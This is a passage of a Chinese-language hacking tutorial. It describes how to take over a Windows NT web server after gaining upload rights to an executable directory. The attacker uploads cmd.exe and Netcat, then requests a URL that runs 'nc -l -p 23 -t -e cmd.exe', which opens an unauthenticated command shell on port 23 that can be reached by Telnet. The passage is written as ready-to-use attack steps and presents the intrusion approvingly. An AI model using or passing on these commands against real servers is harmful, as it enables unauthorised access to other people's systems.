第四个方法:假如您具备一个目录的上传权限,且这个目录具备执行的许可,那么恭喜您,您能够Telnet到这台server了!
下面是具体步骤:
假设您的目录是www.xxx.com/frankie,那么,把cmd.exe(位于C:/winnt/system32/cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去,然后在浏览器端输入:
http://www.xxx.com/frankie/cmd.exe?/c nc.exe -l -p 23 -t -e cmd.exe
这时候您的浏览器将停止不动,实际上server上的Telnet的服务已产生了。
这时,用Telnet连接www.xxx.com的23端口,您发现会不用密码、不用登陆,对方“C:/”提示符已出现在您的眼前!更妙的是,这个Telnet
server是个一次性的服务,当客户端一退出,该服务也将终止。
Netcat不同于一般的特洛伊木马,他能够构建任何的TCP连接服务,在浏览器端输入上述的字符串,等价于在NT的dos方式下输入“nc -l -p
23 -t -e cmd.exe”,这将把cmd.exe绑定到23端口上。
